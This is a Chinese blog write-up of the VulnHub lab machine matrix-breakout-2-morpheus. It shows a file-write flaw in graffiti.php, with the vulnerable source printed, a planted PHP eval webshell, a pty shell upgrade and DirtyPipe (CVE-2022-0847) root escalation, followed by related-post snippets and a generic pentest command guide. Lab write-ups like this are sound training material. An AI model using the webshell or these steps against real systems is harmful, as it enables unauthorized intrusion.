matrix-breakout-2-morpheus vulnhub靶场

最新推荐文章于 2025-03-19 09:21:02 发布
最新推荐文章于 2025-03-19 09:21:02 发布
阅读量508 收藏 8
点赞数 3
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_62621015/article/details/139507669
版权

端口扫描
在这里插入图片描述
80
在这里插入图片描述
81

需要用户名密码登录
在这里插入图片描述
目录扫描
在这里插入图片描述
robots.txt

妹用
在这里插入图片描述
找不到利用点,换个扫描器再扫

发现新的文件
在这里插入图片描述
graffiti.txt
在这里插入图片描述

graffiti.php
在这里插入图片描述
输入的数据Post后会回显到页面上
在这里插入图片描述
抓包看看,居然直接传文件路径
在这里插入图片描述
发现我们post的数据被写入了graffiti.txt文件

这里有可能存在文件任意读取漏洞,尝试修改file的值
在这里插入图片描述
发现可以读取graffiti.php文件
在这里插入图片描述
查看php内容

file默认值为graffifi.txt,接收file,message两个post参数

若存在message参数,则打开file文件并写入

<br>
$file="graffiti.txt";
<br>
if($_SERVER['REQUEST_METHOD'] == 'POST') {
<br>
    if (isset($_POST['file'])) {
<br>
       $file=$_POST['file'];
<br>
    }
<br>
    if (isset($_POST['message'])) {
<br>
        $handle = fopen($file, 'a+') or die('Cannot open file: ' . $file);
<br>
        fwrite($handle, $_POST['message']);
<br>
	fwrite($handle, "\n");
<br>
        fclose($file); 
<br>
    }
<br>
}
<br>

<br>
// Display file
<br>
$handle = fopen($file,"r");
<br>
while (!feof($handle)) {
<br>
  echo fgets($handle);
<br>
  echo "<br>\n";
<br>
}
<br>
fclose($handle);

可以看出来通过修改file的值,可以实现文件任意写入

直接修改file为graffiti.php,message传入一句话木马,蚁剑连接

<?php @eval($_POST['cc']);?>

在这里插入图片描述
在这里插入图片描述
反弹shell
在这里插入图片描述
半交互回显

python3 -c 'import pty; pty.spawn("/bin/bash")'

翻找文件时发现的
在这里插入图片描述
提权
上传linpeas.sh
好几个cve漏洞
在这里插入图片描述

从年份近的开始试起

CVE-2022-0847 DirtyPipe

添加链接描述

执行权限好像不够,直接加777
提权成功
在这里插入图片描述

川川小宝
关注
Vulnhub: Matrix-Breakout: 2 Morpheus靶机
qq_43884092的博客
06-11 572
burp改包写入webshell,CVE-2022-0847提权
2024年网安最全【网络安全】Vulnhub靶场matrix-breakout-2-morpheus
2401_84265972的博客
05-01 912
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
Vulnhub靶场matrix-breakout-2-morpheus
qq_69775412的博客
10-17 904
简介: vulnhub是一个提供靶场环境的平台。今天从首页下载了一个来做,它叫matrix-breakout-2-morpheus
Vulnhub靶场matrix-breakout-2-morpheus攻略
最新发布
2301_78554096的博客
03-19 516
Vulnhub靶场matrix-breakout-2-morpheus攻略,一直到反弹shell
Vulnhub】之matrix-breakout-2-morpheus
zg_111的博客
03-29 1957
上传成功后,我们通过蚁剑连接成功,并且在根目录下找到了FLAG.txt文件,并在文件中发现了flag,提示要找到 cypher 的密码,还提示 80 端口有一个隐藏图片 /.cypher-neo.png。使用burpsuite工具抓包可知,message参数为上传的内容,file参数为内容传入的文件,改变file变量可以直接对靶机文件修改,能随意创建文件。根据扫描的结果发现靶机的IP地址为192.168.15.128,攻击机kali的IP地址为192.168.15.131。让我们先来信息收集一波吧!
matrix-breakout-2-morpheus
2401_88387979的博客
12-25 564
发现网站会将提交的内容追加到graffiti.txt文件中,由于file参数是可控的,那么我们可以修改文件名改变文件上传的路径,尝试上传一句话木马到1.php中。还是将重点放回80端口,因为robot.txt提示我们继续找找,可能是因为我们的字典太小了,我们换个扫描器换个字典试下,利用kali自带的最大的一个字典。在输入框中随便输入,发现输入的数据被显示到页面上,抓包。分别访问这几个端口,也没有什么发现,我们换个思路。我们从当前页面没有得到有用的信息,尝试扫描后台。测试连接成功,添加,成功获取权限。
Vulnhub靶机笔记2——matrix-breakout-2-morpheus
2301_76329510的博客
04-30 1192
发现存在robot.txt、graffiti.txt和graffiti.php三个敏感文件。这是个很牛逼的工具,使用它的linpeas_base.sh进行漏洞扫描。80端口发现两个重要文件test.php和robots.txt。使用CVE-2022-0847 DirtyPipe漏洞。发现可以输入的东西可以写入graffiti.txt。提权成功,这种方法虽然快,但是显得太简单。检测到一个cve-2022-0847漏洞。发现存在CVE-2022-0847漏洞。访问graffiti.txt。
Vulnhub中的Matrix-breakout2-Morpheus
在Web和Reverse坑里游泳中。。。。
01-20 911
又是收获满满的一周!
2024年网络安全最新【网络安全】Vulnhub靶场matrix-breakout-2-morpheus
2401_84281720的博客
05-03 866
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Vulnhub matrix-breakout-2-morpheus靶场攻击实战(一)
初学者
01-16 953
跟之前一样,这个靶场是笔者新找的一个靶场,笔者也没有接触过这个靶场,所以在分享过程中可能有所疏漏,希望大家可以谅解,有问题的地方指出来大家一起进步。
vulhub靶场-matrix-breakout-2-morpheus
mashiro_hibiki的博客
03-11 437
根据提示,在 cypher-neo.png 中存在flag,但是下载图片后并没有发现什么有用的信息,查看图片的时候需要把图片前面的.去掉才能在文件夹中看到图片。这里的话需要注意,提权的话,我们需要有一个bash终端才能在提权后成功获取到root权限的bash,所以我们先用php来获取一个bash。发现开放的端口服务,可以通过爆破ssh弱口令的形式来直接获取服务器权限,但一般ssh的口令都不太好爆破,访问开放的http服务。下载完成后,在vmware中打开,选择刚刚下载的ova文件。
Vulnhub靶场实战—matrix-breakout-2-morpheus
weixin_71914594的博客
10-27 458
靶场下载地址:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/靶场下载连接: https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova攻击机IP:192.168.237.137靶机IP:192.168.237.165。
vulnhub靶场渗透实战15-matrix-breakout-2-morpheus
随心所欲不逾矩
02-08 1179
1:目录扫描,多用几种工具,dirb、gobuster、dirsearch ,ffuf等。2:写入shell:通过抓包写入反弹 shell,写一句话木马连接工具。3;遇到不是很懂的程序,投机取巧一下,利用漏洞提权。
vulnhub靶场1:matrix-breakout-2-morpheus
Genarior的专栏
02-22 807
vulnhub - matrix-breakout-2-morpheus靶场记录
vulnhub靶场Matrix-Breakout 2 Morpheus
qq_58091216的博客
01-31 1846
我们找到了Flag 1!,提示我们从80端口的Web服务器中提取此图像以获得另外一个flag,图像的名称叫/.cypher-neo.png,可以看到是一个隐藏文件。蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)此处有一个file变量,那么改变file变量可以直接对靶机文件修改,能随意创建文件,二话不说写个马,准备反弹shell。截止到目前,我们没有找到任何有用的信息,我们可以换一个思路进行。
【网络安全】Vulnhub靶场matrix-breakout-2-morpheus
fly_enum的博客
12-08 1173
vulnhub是一个提供环境的平台。今天从首页下载了一个来做,它叫matrix-breakout-2-morpheus
matrix-breakout-2-morpheus靶机
2401_86120759的博客
10-28 310
1.利用kali通过靶机物理地址:00:0C:29:CB:15:63获取ip地址:192.168.xxx.xxx。7.尝试上传一句话木马发现失败,使用编码可以成功,使用哥斯拉连接。10.保存会话,查找漏洞利用程序,进行漏洞利用,提权。6.尝试上传查看结果发现可以写入文件中。4.访问IP80端口没什么可利用的。8.使用哥斯拉反弹msf。找到一个可利用的信息。
vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS
信安是不可或缺的一部分!
06-05 1699
这是《黑客帝国》系列的第二部,副标题是《沉睡魔咒:1》。它的主题是回到第一部《黑客帝国》。你扮演的角色是Trinity,试图调查尼布甲尼撒号上的一台电脑,Cypher把其他人都锁在了电脑之外,这台电脑拥有解开谜团的钥匙。使用apache漏洞利用:(失败)在目录爆破时已经注定失败。192.168.200.254为net网卡dhcp地址。192.168.200.2为net网卡网关。网段为:192.168.200.0/24。靶机地址:192.168.200.134。192.168.200.1为物理机地址。
matrix-breakout-2-morpheus 靶机渗透
braty_的博客
04-06 748
输入1 抓包分析,,很轻松发现文件包含漏洞。且这里包含的文件是枚举到的txt文件。准备提权操作,,上传 linpeas.sh 脚本,,检测脆弱性。可利用的很多,,选 CVE-2022-0847。message的内容并没有任何过滤。bash -i 进入交互式终端。下载对应脚本,传到靶机执行即可。这里存在一个文件上传漏洞,,为了简单一点,我们选择上传。发现传参后,参数会保存在。代码太长了,我就不贴了。
Matrix-Breakout-2-Morpheus靶机进行渗透测试
12-13
Matrix-Breakout-2-Morpheus靶机进行渗透测试是一项复杂且具有挑战性的任务。渗透测试的目的是通过模拟黑客的攻击手段,评估系统的安全性并发现潜在的安全漏洞。以下是进行渗透测试的一般步骤和方法: ### 1. 信息收集(Reconnaissance) 在开始渗透测试之前,首先需要进行信息收集。信息收集的目的是尽可能多地了解目标系统,包括操作系统类型、开放端口、服务版本等。 - **使用Nmap扫描端口**:Nmap是一个强大的网络扫描工具,可以扫描目标系统的开放端口和服务。 ```sh nmap -sS -sV -O <目标IP> ``` - **使用Nikto扫描Web漏洞**:Nikto是一个Web服务器扫描工具,可以扫描常见的Web漏洞。 ```sh nikto -h <目标IP> ``` ### 2. 漏洞扫描(Vulnerability Scanning) 在信息收集的基础上,进行漏洞扫描,识别系统中的已知漏洞。 - **使用OpenVAS进行漏洞扫描**:OpenVAS是一个开源的漏洞扫描工具,可以自动扫描系统中的漏洞。 ```sh openvas-scan <目标IP> ``` ### 3. 漏洞利用(Exploitation) 一旦识别出系统中的漏洞,就可以尝试利用这些漏洞来获取系统的访问权限。 - **使用Metasploit进行漏洞利用**:Metasploit是一个流行的渗透测试框架,提供了大量的漏洞利用模块。 ```sh msfconsole use exploit/<模块名称> set RHOST <目标IP> set PAYLOAD <有效载荷> exploit ``` ### 4. 权限提升(Privilege Escalation) 获取系统访问权限后,通常需要提升权限以获得更高的访问级别。 - **使用本地提权工具**:例如,Linux系统中的`sudo -l`命令可以查看当前用户可以执行的命令,Windows系统中的`whoami /priv`命令可以查看当前用户的权限。 ### 5. 后渗透操作(Post-Exploitation) 在获取系统权限后,可以进行后渗透操作,例如数据窃取、系统破坏等。 - **使用Meterpreter进行后渗透操作**:Meterpreter是Metasploit中的一个后渗透模块,提供了丰富的功能。 ```sh meterpreter > sysinfo meterpreter > download <文件路径> ``` ### 6. 报告(Reporting) 最后,生成渗透测试报告,详细记录测试过程中发现的问题和漏洞,并提出修复建议。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值